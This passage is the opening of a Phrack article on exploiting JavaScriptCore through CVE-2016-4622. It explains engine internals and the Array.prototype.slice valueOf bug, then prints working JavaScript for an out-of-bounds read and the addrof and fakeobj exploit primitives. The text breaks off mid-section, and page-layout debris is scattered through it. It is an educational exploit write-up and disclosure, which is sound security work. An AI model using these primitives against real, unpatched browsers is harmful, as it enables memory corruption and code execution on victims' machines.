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1627 lines
70 KiB
Plaintext
1627 lines
70 KiB
Plaintext
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==Phrack Inc.==
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Volume 0x10, Issue 0x46, Phile #0x03 of 0x0f
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|=-----------------------------------------------------------------------=|
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|=---------------=[ The Art of Exploitation ]=---------------=|
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|=-----------------------------------------------------------------------=|
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|=------------------=[ Attacking JavaScript Engines ]=-------------------=|
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|=--------=[ A case study of JavaScriptCore and CVE-2016-4622 ]=---------=|
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|=-----------------------------------------------------------------------=|
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|=----------------------------=[ saelo ]=--------------------------------=|
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|=-----------------------=[ phrack@saelo.net ]=--------------------------=|
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|=-----------------------------------------------------------------------=|
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--[ Table of contents
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0 - Introduction
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1 - JavaScriptCore overview
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1.1 - Values, the VM, and (NaN-)boxing
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1.2 - Objects and arrays
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1.3 - Functions
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2 - The bug
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2.1 - The vulnerable code
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2.2 - About JavaScript type conversions
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2.3 - Exploiting with valueOf
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2.4 - Reflecting on the bug
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3 - The JavaScriptCore heaps
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3.1 - Garbage collector basics
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3.2 - Marked space
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3.3 - Copied space
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4 - Constructing exploit primitives
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4.1 - Prerequisites: Int64
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4.2 - addrof and fakeobj
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4.3 - Plan of exploitation
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5 - Understanding the JSObject system
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5.1 - Property storage
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5.2 - JSObject internals
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5.3 - About structures
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6 - Exploitation
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6.1 - Predicting structure IDs
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6.2 - Putting things together: faking a Float64Array
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6.3 - Executing shellcode
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6.4 - Surviving garbage collection
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6.5 - Summary
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7 - Abusing the renderer process
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7.1 - WebKit process and privilege model
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7.2 - The same-origin policy
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7.3 - Stealing emails
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8 - References
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9 - Source code
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--[ 0 - Introduction
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This article strives to give an introduction to the topic of JavaScript
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engine exploitation at the example of a specific vulnerability. The
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particular target will be JavaScriptCore, the engine inside WebKit.
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The vulnerability in question is CVE-2016-4622 and was discovered by yours
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truly in early 2016, then reported as ZDI-16-485 [1]. It allows an attacker
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to leak addresses as well as inject fake JavaScript objects into the
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engine. Combining these primitives will result in remote code execution
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inside the renderer process. The bug was fixed in 650552a. Code snippets in
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this article were taken from commit 320b1fc, which was the last vulnerable
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revision. The vulnerability was introduced approximately one year earlier
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with commit 2fa4973. All exploit code was tested on Safari 9.1.1.
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The exploitation of said vulnerability requires knowledge of various engine
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internals, which are, however, also quite interesting by themselves. As
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such various pieces that are part of a modern JavaScript engine will be
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discussed along the way. We will focus on the implementation of
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JavaScriptCore, but the concepts will generally be applicable to other
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engines as well.
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Prior knowledge of the JavaScript language will, for the most part, not be
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required.
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--[ 1 - JavaScript engine overview
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On a high level, a JavaScript engine contains
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* a compiler infrastructure, typically including at least one
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just-in-time (JIT) compiler
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* a virtual machine that operates on JavaScript values
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* a runtime that provides a set of builtin objects and functions
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We will not be concerned about the inner workings of the compiler
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infrastructure too much as they are mostly irrelevant to this specific bug.
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For our purposes it suffices to treat the compiler as a black box which
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emits bytecode (and potentially native code in the case of a JIT compiler)
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from the given source code.
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----[ 1.1 - The VM, Values, and NaN-boxing
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The virtual machine (VM) typically contains an interpreter which can
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directly execute the emitted bytecode. The VM is often implemented as
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stack-based machines (in contrast to register-based machines) and thus
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operate around a stack of values. The implementation of a specific opcode
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handler might then look something like this:
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CASE(JSOP_ADD)
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{
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MutableHandleValue lval = REGS.stackHandleAt(-2);
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MutableHandleValue rval = REGS.stackHandleAt(-1);
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MutableHandleValue res = REGS.stackHandleAt(-2);
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if (!AddOperation(cx, lval, rval, res))
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goto error;
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REGS.sp--;
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}
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END_CASE(JSOP_ADD)
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Note that this example is actually taken from Firefox' Spidermonkey engine
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as JavaScriptCore (from here on abbreviated as JSC) uses an interpreter
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that is written in a form of assembly language and thus not quite as
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straightforward as the above example. The interested reader can however
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find the implementation of JSC's low-level interpreter (llint) in
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LowLevelInterpreter64.asm.
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Often the first stage JIT compiler (sometimes called baseline JIT) takes
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care of removing some of the dispatching overhead of the interpreter while
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higher stage JIT compilers perform sophisticated optimizations, similar to
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the ahead-of-time compilers we are used to. Optimizing JIT compilers are
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typically speculative, meaning they will perform optimizations based on
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some speculation, e.g. 'this variable will always contain a number'.
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Should the speculation ever turn out to be incorrect, the code will usually
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bail out to one of the lower tiers. For more information about the
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different execution modes the reader is referred to [2] and [3].
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JavaScript is a dynamically typed language. As such, type information is
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associated with the (runtime) values rather than (compile-time) variables.
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The JavaScript type system [4] defines primitive types (number, string,
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boolean, null, undefined, symbol) and objects (including arrays and
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functions). In particular, there is no concept of classes in the JavaScript
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language as is present in other languages. Instead, JavaScript uses what is
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called "prototype-based-inheritance", where each objects has a (possibly
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null) reference to a prototype object whose properties it incorporates.
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The interested reader is referred to the JavaScript specification [5] for
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more information.
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All major JavaScript engines represent a value with no more than 8 bytes
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for performance reasons (fast copying, fits into a register on 64-bit
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architectures). Some engines like Google's v8 use tagged pointers to
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represent values. Here the least significant bits indicate whether the
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value is a pointer or some form of immediate value. JavaScriptCore (JSC)
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and Spidermonkey in Firefox on the other hand use a concept called
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NaN-boxing. NaN-boxing makes use of the fact that there exist multiple bit
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patterns which all represent NaN, so other values can be encoded in these.
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Specifically, every IEEE 754 floating point value with all exponent bits
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set, but a fraction not equal to zero represents NaN. For double precision
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values [6] this leaves us with 2^51 different bit patterns (ignoring the
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sign bit and setting the first fraction bit to one so nullptr can still be
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represented). That's enough to encode both 32-bit integers and pointers,
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since even on 64-bit platforms only 48 bits are currently used for
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addressing.
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The scheme used by JSC is nicely explained in JSCJSValue.h, which the
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reader is encouraged to read. The relevant part is quoted below as it will
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be important later on:
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* The top 16-bits denote the type of the encoded JSValue:
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*
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* Pointer { 0000:PPPP:PPPP:PPPP
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* / 0001:****:****:****
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* Double { ...
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* \ FFFE:****:****:****
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* Integer { FFFF:0000:IIII:IIII
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*
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* The scheme we have implemented encodes double precision values by
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* performing a 64-bit integer addition of the value 2^48 to the number.
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* After this manipulation no encoded double-precision value will begin
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* with the pattern 0x0000 or 0xFFFF. Values must be decoded by
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* reversing this operation before subsequent floating point operations
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* may be performed.
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*
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* 32-bit signed integers are marked with the 16-bit tag 0xFFFF.
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*
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* The tag 0x0000 denotes a pointer, or another form of tagged
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* immediate. Boolean, null and undefined values are represented by
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* specific, invalid pointer values:
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*
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* False: 0x06
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* True: 0x07
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* Undefined: 0x0a
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* Null: 0x02
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*
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Interestingly, 0x0 is not a valid JSValue and will lead to a crash inside
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the engine.
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----[ 1.2 - Objects and Arrays
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Objects in JavaScript are essentially collections of properties which are
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stored as (key, value) pairs. Properties can be accessed either with the
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dot operator (foo.bar) or through square brackets (foo['bar']). At least in
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theory, values used as keys are converted to strings before performing the
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lookup.
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Arrays are described by the specification as special ("exotic") objects
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whose properties are also called elements if the property name can be
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represented by a 32-bit integer [7]. Most engines today extend this notion
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to all objects. An array then becomes an object with a special 'length'
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property whose value is always equal to the index of the highest element
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plus one. The net result of all this is that every object has both
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properties, accessed through a string or symbol key, and elements, accessed
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through integer indices.
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Internally, JSC stores both properties and elements in the same memory
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region and stores a pointer to that region in the object itself. This
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pointer points to the middle of the region, properties are stored to the
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left of it (lower addresses) and elements to the right of it. There is also
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a small header located just before the pointed to address that contains
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the length of the element vector. This concept is called a "Butterfly"
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since the values expand to the left and right, similar to the wings of a
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butterfly. Presumably. In the following, we will refer to both the pointer
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and the memory region as "Butterfly". In case it is not obvious from the
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context, the specific meaning will be noted.
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--------------------------------------------------------
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.. | propY | propX | length | elem0 | elem1 | elem2 | ..
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--------------------------------------------------------
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^
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+---------------+
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+-------------+
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| Some Object |
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+-------------+
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Although typical, elements do not have to be stored linearly in memory.
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In particular, code such as
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a = [];
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a[0] = 42;
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a[10000] = 42;
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will likely lead to an array stored in some kind of sparse mode, which
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performs an additional mapping step from the given index to an index into
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the backing storage. That way this array does not require 10001 value
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slots. Besides the different array storage models, arrays can also store
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their data using different representations. For example, an array of 32-bit
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integers could be stored in native form to avoid the (NaN-)unboxing and
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reboxing process during most operations and save some memory. As such, JSC
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defines a set of different indexing types which can be found in
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IndexingType.h. The most important ones are:
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ArrayWithInt32 = IsArray | Int32Shape;
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ArrayWithDouble = IsArray | DoubleShape;
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ArrayWithContiguous = IsArray | ContiguousShape;
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Here, the last type stores JSValues while the former two store their native
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types.
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At this point the reader probably wonders how a property lookup is
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performed in this model. We will dive into this extensively later on, but
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the short version is that a special meta-object, called a "structure" in
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JSC, is associated with every object which provides a mapping from property
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names to slot numbers.
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----[ 1.3 - Functions
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Functions are quite important in the JavaScript language. As such they
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deserve some discussion on their own.
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When executing a function's body, two special variables become available.
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One of them, 'arguments' provides access to the arguments (and caller) of
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the function, thus enabling the creation of function with a variable number
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of arguments. The other, 'this', refers to different objects depending on
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the invocation of the function:
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* If the function was called as a constructor (using 'new func()'),
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then 'this' points to the newly created object. Its prototype has
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already been set to the .prototype property of the function object,
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which is set to a new object during function definition.
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* If the function was called as a method of some object (using
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'obj.func()'), then 'this' will point to the reference object.
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* Else 'this' simply points to the current global object, as it does
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outside of a function as well.
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Since functions are first class objects in JavaScript they too can have
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properties. We've already seen the .prototype property above. Two other
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quite interesting properties of each function (actually of the function
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prototype) are the .call and .apply functions, which allow calling the
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function with a given 'this' object and arguments. This can for example be
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used to implement decorator functionality:
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function decorate(func) {
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return function() {
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for (var i = 0; i < arguments.length; i++) {
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// do something with arguments[i]
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}
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return func.apply(this, arguments);
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};
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}
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This also has some implications on the implementation of JavaScript
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functions inside the engine as they cannot make any assumptions about the
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value of the reference object which they are called with, as it can be set
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to arbitrary values from script. Thus, all internal JavaScript functions
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will need to check the type of not only their arguments but also of the
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this object.
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Internally, the built-in functions and methods [8] are usually implemented
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in one of two ways: as native functions in C++ or in JavaScript itself.
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Let's look at a simple example of a native function in JSC: the
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implementation of Math.pow():
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EncodedJSValue JSC_HOST_CALL mathProtoFuncPow(ExecState* exec)
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{
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// ECMA 15.8.2.1.13
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double arg = exec->argument(0).toNumber(exec);
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double arg2 = exec->argument(1).toNumber(exec);
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return JSValue::encode(JSValue(operationMathPow(arg, arg2)));
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}
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We can see:
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1. The signature for native JavaScript functions
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2. How arguments are extracted using the argument method (which returns
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the undefined value if not enough arguments were provided)
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3. How arguments are converted to their required type. There is a set
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of conversion rules governing the conversion of e.g. arrays to
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numbers which toNumber will make use of. More on these later.
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4. How the actual operation is performed on the native data type
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5. How the result is returned to the caller. In this case simply by
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encoding the resulting native number into a value.
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There is another pattern visible here: the core implementation of various
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operations (in this case operationMathPow) are moved into separate
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functions so they can be called directly from JIT compiled code.
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--[ 2 - The bug
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The bug in question lies in the implementation of Array.prototype.slice
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[9]. The native function arrayProtoFuncSlice, located in
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ArrayPrototype.cpp, is invoked whenever the slice method is called in
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JavaScript:
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var a = [1, 2, 3, 4];
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var s = a.slice(1, 3);
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// s now contains [2, 3]
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The implementation is given below with minor reformatting, some omissions
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for readability, and markers for the explanation below. The full
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implementation can be found online as well [10].
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EncodedJSValue JSC_HOST_CALL arrayProtoFuncSlice(ExecState* exec)
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{
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/* [[ 1 ]] */
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JSObject* thisObj = exec->thisValue()
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.toThis(exec, StrictMode)
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.toObject(exec);
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if (!thisObj)
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return JSValue::encode(JSValue());
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/* [[ 2 ]] */
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unsigned length = getLength(exec, thisObj);
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if (exec->hadException())
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return JSValue::encode(jsUndefined());
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/* [[ 3 ]] */
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unsigned begin = argumentClampedIndexFromStartOrEnd(exec, 0, length);
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unsigned end =
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argumentClampedIndexFromStartOrEnd(exec, 1, length, length);
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/* [[ 4 ]] */
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std::pair<SpeciesConstructResult, JSObject*> speciesResult =
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speciesConstructArray(exec, thisObj, end - begin);
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// We can only get an exception if we call some user function.
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if (UNLIKELY(speciesResult.first ==
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SpeciesConstructResult::Exception))
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return JSValue::encode(jsUndefined());
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/* [[ 5 ]] */
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if (LIKELY(speciesResult.first == SpeciesConstructResult::FastPath &&
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isJSArray(thisObj))) {
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if (JSArray* result =
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asArray(thisObj)->fastSlice(*exec, begin, end - begin))
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return JSValue::encode(result);
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}
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JSObject* result;
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if (speciesResult.first == SpeciesConstructResult::CreatedObject)
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result = speciesResult.second;
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else
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result = constructEmptyArray(exec, nullptr, end - begin);
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unsigned n = 0;
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for (unsigned k = begin; k < end; k++, n++) {
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JSValue v = getProperty(exec, thisObj, k);
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if (exec->hadException())
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return JSValue::encode(jsUndefined());
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if (v)
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result->putDirectIndex(exec, n, v);
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}
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setLength(exec, result, n);
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return JSValue::encode(result);
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}
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The code essentially does the following:
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1. Obtain the reference object for the method call (this will be the
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array object)
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||
|
2. Retrieve the length of the array
|
||
|
|
||
|
3. Convert the arguments (start and end index) into native integer
|
||
|
types and clamp them to the range [0, length)
|
||
|
|
||
|
4. Check if a species constructor [11] should be used
|
||
|
|
||
|
5. Perform the slicing
|
||
|
|
||
|
The last step is done in one of two ways: if the array is a native array
|
||
|
with dense storage, 'fastSlice' will be used which just memcpy's the values
|
||
|
into the new array using the given index and length. If the fast path is
|
||
|
not possible, a simple loop is used to fetch each element and add it to the
|
||
|
new array. Note that, in contrast to the property accessors used on the
|
||
|
slow path, fastSlice does not perform any additional bounds checking... ;)
|
||
|
|
||
|
Looking at the code, it is easy to assume that the variables 'begin' and
|
||
|
`end` would be smaller than the size of the array after they had been
|
||
|
converted to native integers. However, we can violate that assumption by
|
||
|
(ab)using the JavaScript type conversion rules.
|
||
|
|
||
|
|
||
|
----[ 2.2 - About JavaScript conversion rules
|
||
|
|
||
|
JavaScript is inherently weakly typed, meaning it will happily convert
|
||
|
values of different types into the type that it currently requires.
|
||
|
Consider Math.abs(), which returns the absolute value of the argument. All
|
||
|
of the following are "valid" invocations, meaning they won't raise an
|
||
|
exception:
|
||
|
|
||
|
Math.abs(-42); // argument is a number
|
||
|
// 42
|
||
|
Math.abs("-42"); // argument is a string
|
||
|
// 42
|
||
|
Math.abs([]); // argument is an empty array
|
||
|
// 0
|
||
|
Math.abs(true); // argument is a boolean
|
||
|
// 1
|
||
|
Math.abs({}); // argument is an object
|
||
|
// NaN
|
||
|
|
||
|
In contrast, strongly-typed languages such as python will usually raise an
|
||
|
exception (or, in case of statically-typed languages, issue a compiler
|
||
|
error) if e.g. a string is passed to abs().
|
||
|
|
||
|
The conversion rules for numeric types are described in [12]. The rules
|
||
|
governing the conversion from object types to numbers (and primitive types
|
||
|
in general) are especially interesting. In particular, if the object has a
|
||
|
callable property named "valueOf", this method will be called and the
|
||
|
return value used if it is a primitive value. And thus:
|
||
|
|
||
|
Math.abs({valueOf: function() { return -42; }});
|
||
|
// 42
|
||
|
|
||
|
|
||
|
----[ 2.3 - Exploiting with "valueOf"
|
||
|
|
||
|
In the case of `arrayProtoFuncSlice` the conversion to a primitive type is
|
||
|
performed in argumentClampedIndexFromStartOrEnd. This method also clamps
|
||
|
the arguments to the range [0, length):
|
||
|
|
||
|
JSValue value = exec->argument(argument);
|
||
|
if (value.isUndefined())
|
||
|
return undefinedValue;
|
||
|
|
||
|
double indexDouble = value.toInteger(exec); // Conversion happens here
|
||
|
if (indexDouble < 0) {
|
||
|
indexDouble += length;
|
||
|
return indexDouble < 0 ? 0 : static_cast<unsigned>(indexDouble);
|
||
|
}
|
||
|
return indexDouble > length ? length :
|
||
|
static_cast<unsigned>(indexDouble);
|
||
|
|
||
|
Now, if we modify the length of the array inside a valueOf function of one
|
||
|
of the arguments, then the implementation of slice will continue to use the
|
||
|
previous length, resulting in an out-of-bounds access during the memcpy.
|
||
|
|
||
|
Before doing this however, we have to make sure that the element storage is
|
||
|
actually resized if we shrink the array. For that let's have a quick look
|
||
|
at the implementation of the .length setter. From JSArray::setLength:
|
||
|
|
||
|
unsigned lengthToClear = butterfly->publicLength() - newLength;
|
||
|
unsigned costToAllocateNewButterfly = 64; // a heuristic.
|
||
|
if (lengthToClear > newLength &&
|
||
|
lengthToClear > costToAllocateNewButterfly) {
|
||
|
reallocateAndShrinkButterfly(exec->vm(), newLength);
|
||
|
return true;
|
||
|
}
|
||
|
|
||
|
This code implements a simple heuristic to avoid relocating the array too
|
||
|
often. To force a relocation of our array we will thus need the new size to
|
||
|
be much less then the old size. Resizing from e.g. 100 elements to 0 will
|
||
|
do the trick.
|
||
|
|
||
|
With that, here's how we can exploit Array.prototype.slice:
|
||
|
|
||
|
var a = [];
|
||
|
for (var i = 0; i < 100; i++)
|
||
|
a.push(i + 0.123);
|
||
|
|
||
|
var b = a.slice(0, {valueOf: function() { a.length = 0; return 10; }});
|
||
|
// b = [0.123,1.123,2.12199579146e-313,0,0,0,0,0,0,0]
|
||
|
|
||
|
The correct output would have been an array of size 10 filled with
|
||
|
'undefined' values since the array has been cleared prior to the slice
|
||
|
operation. However, we can see some float values in the array. Seems like
|
||
|
we've read some stuff past the end of the array elements :)
|
||
|
|
||
|
|
||
|
----[ 2.4 - Reflecting on the bug
|
||
|
|
||
|
This particular programming mistake is not new and has been exploited for a
|
||
|
while now [13, 14, 15]. The core problem here is (mutable) state that is
|
||
|
"cached" in a stack frame (in this case the length of the array object) in
|
||
|
combination with various callback mechanisms that can execute user supplied
|
||
|
code further down in the call stack (in this case the "valueOf" method).
|
||
|
With this setting it is quite easy to make false assumptions about the
|
||
|
state of the engine throughout a function. The same kind of problem
|
||
|
appears in the DOM as well due to the various event callbacks.
|
||
|
|
||
|
|
||
|
--[ 3 - The JavaScriptCore heaps
|
||
|
|
||
|
At this point we've read data past our array but don't quite know what we
|
||
|
are accessing there. To understand this, some background knowledge about
|
||
|
the JSC heap allocators is required.
|
||
|
|
||
|
|
||
|
----[ 3.1 - Garbage collector basics
|
||
|
|
||
|
JavaScript is a garbage collected language, meaning the programmer does not
|
||
|
need to care about memory management. Instead, the garbage collector will
|
||
|
collect unreachable objects from time to time.
|
||
|
|
||
|
One approach to garbage collection is reference counting, which is used
|
||
|
extensively in many applications. However, as of today, all major
|
||
|
JavaScript engines instead use a mark and sweep algorithm. Here the
|
||
|
collector regularly scans all alive objects, starting from a set of root
|
||
|
nodes, and afterwards frees all dead objects. The root nodes are usually
|
||
|
pointers located on the stack as well as global objects like the 'window'
|
||
|
object in a web browser context.
|
||
|
|
||
|
There are various distinctions between garbage collection systems. We will
|
||
|
now discuss some key properties of garbage collection systems which should
|
||
|
help the reader understand some of the related code. Readers familiar with
|
||
|
the subject are free to skip to the end of this section.
|
||
|
|
||
|
First off, JSC uses a conservative garbage collector [16]. In essence, this
|
||
|
means that the GC does not keep track of the root nodes itself. Instead,
|
||
|
during GC it will scan the stack for any value that could be a pointer into
|
||
|
the heap and treats those as root nodes. In contrast, e.g. Spidermonkey
|
||
|
uses a precise garbage collector and thus needs to wrap all references to
|
||
|
heap objects on the stack inside a pointer class (Rooted<>) that takes care
|
||
|
of registering the object with the garbage collector.
|
||
|
|
||
|
Next, JSC uses an incremental garbage collector. This kind of garbage
|
||
|
collector performs the marking in several steps and allows the application
|
||
|
to run in between, reducing GC latency. However, this requires some
|
||
|
additional effort to work correctly. Consider the following case:
|
||
|
|
||
|
* the GC runs and visits some object O and all its referenced objects.
|
||
|
It marks them as visited and later pauses so the application can run
|
||
|
again.
|
||
|
|
||
|
* O is modified and a new reference to another Object P is added to it.
|
||
|
|
||
|
* Then the GC runs again but it doesn't know about P. It finishes the
|
||
|
marking phase and frees the memory of P.
|
||
|
|
||
|
To avoid this scenario, so called write barriers are inserted into the
|
||
|
engine. These take care of notifying the garbage collector in such a
|
||
|
scenario. These barriers are implemented in JSC with the WriteBarrier<>
|
||
|
and CopyBarrier<> classes.
|
||
|
|
||
|
Last, JSC uses both, a moving and a non-moving garbage collector. A moving
|
||
|
garbage collector moves live objects to a different location and updates
|
||
|
all pointers to these objects. This optimizes for the case of many dead
|
||
|
objects since there is no runtime overhead for these: instead of adding
|
||
|
them to a free list, the whole memory region is simply declared free. JSC
|
||
|
stores the JavaScript objects itself, together with a few other objects,
|
||
|
inside a non-moving heap, the marked space, while storing the butterflies
|
||
|
and other arrays inside a moving heap, the copied space.
|
||
|
|
||
|
|
||
|
----[ 3.2 - Marked space
|
||
|
|
||
|
The marked space is a collection of memory blocks that keep track of the
|
||
|
allocated cells. In JSC, every object allocated in marked space must
|
||
|
inherit from the JSCell class and thus starts with an eight byte header,
|
||
|
which, among other fields, contains the current cell state as used by the
|
||
|
GC. This field is used by the collector to keep track of the cells that it
|
||
|
has already visited.
|
||
|
|
||
|
There is another thing worth mentioning about the marked space: JSC stores
|
||
|
a MarkedBlock instance at the beginning of each marked block:
|
||
|
|
||
|
inline MarkedBlock* MarkedBlock::blockFor(const void* p)
|
||
|
{
|
||
|
return reinterpret_cast<MarkedBlock*>(
|
||
|
reinterpret_cast<Bits>(p) & blockMask);
|
||
|
}
|
||
|
|
||
|
This instance contains among other things a pointers to the owning Heap
|
||
|
and VM instance which allows the engine to obtain these if they are not
|
||
|
available in the current context. This makes it more difficult to set up
|
||
|
fake objects, as a valid MarkedBlock instance might be required when
|
||
|
performing certain operations. It is thus desirable to create fake objects
|
||
|
inside a valid marked block if possible.
|
||
|
|
||
|
|
||
|
----[ 3.3 - Copied space
|
||
|
|
||
|
The copied space stores memory buffers that are associated with some object
|
||
|
inside the marked space. These are mostly butterflies, but the contents of
|
||
|
typed arrays may also be located here. As such, our out-of-bounds access
|
||
|
happens in this memory region.
|
||
|
|
||
|
The copied space allocator is very simple:
|
||
|
|
||
|
CheckedBoolean CopiedAllocator::tryAllocate(size_t bytes, void** out)
|
||
|
{
|
||
|
ASSERT(is8ByteAligned(reinterpret_cast<void*>(bytes)));
|
||
|
|
||
|
size_t currentRemaining = m_currentRemaining;
|
||
|
if (bytes > currentRemaining)
|
||
|
return false;
|
||
|
currentRemaining -= bytes;
|
||
|
m_currentRemaining = currentRemaining;
|
||
|
*out = m_currentPayloadEnd - currentRemaining - bytes;
|
||
|
|
||
|
ASSERT(is8ByteAligned(*out));
|
||
|
|
||
|
return true;
|
||
|
}
|
||
|
|
||
|
This is essentially a bump allocator: it will simply return the next N
|
||
|
bytes of memory in the current block until the block is completely used.
|
||
|
Thus, it is almost guaranteed that two following allocations will be placed
|
||
|
adjacent to each other in memory (the edge case being that the first fills
|
||
|
up the current block).
|
||
|
|
||
|
This is good news for us. If we allocate two arrays with one element each,
|
||
|
then the two butterflies will be next to each other in virtually every
|
||
|
case.
|
||
|
|
||
|
|
||
|
--[ 4 - Building exploit primitives
|
||
|
|
||
|
While the bug in question looks like an out-of-bound read at first, it is
|
||
|
actually a more powerful primitive as it lets us "inject" JSValues of our
|
||
|
choosing into the newly created JavaScript arrays, and thus into the
|
||
|
engine.
|
||
|
|
||
|
We will now construct two exploit primitives from the given bug, allowing
|
||
|
us to
|
||
|
|
||
|
1. leak the address of an arbitrary JavaScript object and
|
||
|
|
||
|
2. inject a fake JavaScript Object into the engine.
|
||
|
|
||
|
We will call these primitives 'addrof' and 'fakeobj'.
|
||
|
|
||
|
|
||
|
----[ 4.1 Prerequisites: Int64
|
||
|
|
||
|
As we've previously seen, our exploit primitive currently returns floating
|
||
|
point values instead of integers. In fact, at least in theory, all numbers
|
||
|
in JavaScript are 64-bit floating point numbers [17]. In reality, as
|
||
|
already mentioned, most engines have a dedicated 32-bit integer type for
|
||
|
performance reasons, but convert to floating point values when necessary
|
||
|
(i.e. on overflow). It is thus not possible to represent arbitrary 64-bit
|
||
|
integers (and in particular addresses) with primitive numbers in
|
||
|
JavaScript.
|
||
|
|
||
|
As such, a helper module had to be built which allowed storing 64-bit
|
||
|
integer instances. It supports
|
||
|
|
||
|
* Initialization of Int64 instances from different argument types:
|
||
|
strings, numbers and byte arrays.
|
||
|
|
||
|
* Assigning the result of addition and subtraction to an existing
|
||
|
instance through the assignXXX methods. Using these methods avoids
|
||
|
further heap allocations which might be desirable at times.
|
||
|
|
||
|
* Creating new instances that store the result of an addition or
|
||
|
subtraction through the Add and Sub functions.
|
||
|
|
||
|
* Converting between doubles, JSValues and Int64 instances such that
|
||
|
the underlying bit pattern stays the same.
|
||
|
|
||
|
The last point deserves further discussing. As we've seen above, we obtain
|
||
|
a double whose underlying memory interpreted as native integer is our
|
||
|
desired address. We thus need to convert between native doubles and our
|
||
|
integers such that the underlying bits stay the same. asDouble() can be
|
||
|
thought of as running the following C code:
|
||
|
|
||
|
double asDouble(uint64_t num)
|
||
|
{
|
||
|
return *(double*)#
|
||
|
}
|
||
|
|
||
|
The asJSValue method further respects the NaN-boxing procedure and produces
|
||
|
a JSValue with the given bit pattern. The interested reader is referred to
|
||
|
the int64.js file inside the attached source code archive for more
|
||
|
details.
|
||
|
|
||
|
With this out of the way let us get back to building our two exploit
|
||
|
primitives.
|
||
|
|
||
|
|
||
|
----[ 4.2 addrof and fakeobj
|
||
|
|
||
|
Both primitives rely on the fact that JSC stores arrays of doubles in
|
||
|
native representation as opposed to the NaN-boxed representation. This
|
||
|
essentially allows us to write native doubles (indexing type
|
||
|
ArrayWithDoubles) but have the engine treat them as JSValues (indexing type
|
||
|
ArrayWithContiguous) and vice versa.
|
||
|
|
||
|
So, here are the steps required for exploiting the address leak:
|
||
|
|
||
|
1. Create an array of doubles. This will be stored internally as
|
||
|
IndexingType ArrayWithDouble
|
||
|
|
||
|
2. Set up an object with a custom valueOf function which will
|
||
|
|
||
|
2.1 shrink the previously created array
|
||
|
|
||
|
2.2 allocate a new array containing just the object whose address
|
||
|
we wish to know. This array will (most likely) be placed right
|
||
|
behind the new butterfly since it's located in copied space
|
||
|
|
||
|
2.3 return a value larger than the new size of the array to trigger
|
||
|
the bug
|
||
|
|
||
|
3. Call slice() on the target array the object from step 2 as one of
|
||
|
the arguments
|
||
|
|
||
|
We will now find the desired address in the form of a 64-bit floating point
|
||
|
value inside the array. This works because slice() preserves the indexing
|
||
|
type. Our new array will thus treat the data as native doubles as well,
|
||
|
allowing us to leak arbitrary JSValue instances, and thus pointers.
|
||
|
|
||
|
The fakeobj primitive works essentially the other way around. Here we
|
||
|
inject native doubles into an array of JSValues, allowing us to create
|
||
|
JSObject pointers:
|
||
|
|
||
|
1. Create an array of objects. This will be stored internally as
|
||
|
IndexingType ArrayWithContiguous
|
||
|
|
||
|
2. Set up an object with a custom valueOf function which will
|
||
|
|
||
|
2.1 shrink the previously created array
|
||
|
|
||
|
2.2 allocate a new array containing just a double whose bit pattern
|
||
|
matches the address of the JSObject we wish to inject. The
|
||
|
double will be stored in native form since the array's
|
||
|
IndexingType will be ArrayWithDouble
|
||
|
|
||
|
2.3 return a value larger than the new size of the array to trigger
|
||
|
the bug
|
||
|
|
||
|
3. Call slice() on the target array the object from step 2 as one of
|
||
|
the arguments
|
||
|
|
||
|
For completeness, the implementation of both primitives is printed below.
|
||
|
|
||
|
function addrof(object) {
|
||
|
var a = [];
|
||
|
for (var i = 0; i < 100; i++)
|
||
|
a.push(i + 0.1337); // Array must be of type ArrayWithDoubles
|
||
|
|
||
|
var hax = {valueOf: function() {
|
||
|
a.length = 0;
|
||
|
a = [object];
|
||
|
return 4;
|
||
|
}};
|
||
|
|
||
|
var b = a.slice(0, hax);
|
||
|
return Int64.fromDouble(b[3]);
|
||
|
}
|
||
|
|
||
|
function fakeobj(addr) {
|
||
|
var a = [];
|
||
|
for (var i = 0; i < 100; i++)
|
||
|
a.push({}); // Array must be of type ArrayWithContiguous
|
||
|
|
||
|
addr = addr.asDouble();
|
||
|
var hax = {valueOf: function() {
|
||
|
a.length = 0;
|
||
|
a = [addr];
|
||
|
return 4;
|
||
|
}};
|
||
|
|
||
|
return a.slice(0, hax)[3];
|
||
|
}
|
||
|
|
||
|
|
||
|
----[ 4.3 - Plan of exploitation
|
||
|
|
||
|
From here on our goal will be to obtain an arbitrary memory read/write
|
||
|
primitive through a fake JavaScript object. We are faced with the following
|
||
|
questions:
|
||
|
|
||
|
Q1. What kind of object do we want to fake?
|
||
|
|
||
|
Q2. How do we fake such an object?
|
||
|
|
||
|
Q3. Where do we place the faked object so that we know its address?
|
||
|
|
||
|
For a while now, JavaScript engines have supported typed arrays [18], an
|
||
|
efficient and highly optimizable storage for raw binary data. These turn
|
||
|
out to be good candidates for our fake object as they are mutable (in
|
||
|
contrast to JavaScript strings) and thus controlling their data pointer
|
||
|
yields an arbitrary read/write primitive usable from script. Ultimately our
|
||
|
goal will now be to fake a Float64Array instance.
|
||
|
|
||
|
We will now turn to Q2 and Q3, which require another discussion of JSC
|
||
|
internals, namely the JSObject system.
|
||
|
|
||
|
|
||
|
--[ 5 - Understanding the JSObject system
|
||
|
|
||
|
JavaScript objects are implemented in JSC by a combination of C++ classes.
|
||
|
At the center lies the JSObject class which is itself a JSCell (and as such
|
||
|
tracked by the garbage collector). There are various subclasses of JSObject
|
||
|
that loosely resemble different JavaScript objects, such as Arrays
|
||
|
(JSArray), Typed arrays (JSArrayBufferView), or Proxys (JSProxy).
|
||
|
|
||
|
We will now explore the different parts that make up JSObjects inside the
|
||
|
JSC engine.
|
||
|
|
||
|
|
||
|
----[ 5.1 - Property storage
|
||
|
|
||
|
Properties are the most important aspect of JavaScript objects. We have
|
||
|
already seen how properties are stored in the engine: the butterfly. But
|
||
|
that is only half the truth. Besides the butterfly, JSObjects can also have
|
||
|
inline storage (6 slots by default, but subject to runtime analysis),
|
||
|
located right after the object in memory. This can result in a slight
|
||
|
performance gain if no butterfly ever needs to be allocated for an object.
|
||
|
|
||
|
The inline storage is interesting for us since we can leak the address of
|
||
|
an object, and thus know the address of its inline slots. These make up a
|
||
|
good candidate to place our fake object in. As added bonus, going this way
|
||
|
we also avoid any problem that might arise when placing an object outside
|
||
|
of a marked block as previously discussed. This answers Q3.
|
||
|
|
||
|
Let's turn to Q2 now.
|
||
|
|
||
|
|
||
|
----[ 5.2 - JSObject internals
|
||
|
|
||
|
We will start with an example: suppose we run the following piece of JS
|
||
|
code:
|
||
|
|
||
|
obj = {'a': 0x1337, 'b': false, 'c': 13.37, 'd': [1,2,3,4]};
|
||
|
|
||
|
This will result in the following object:
|
||
|
|
||
|
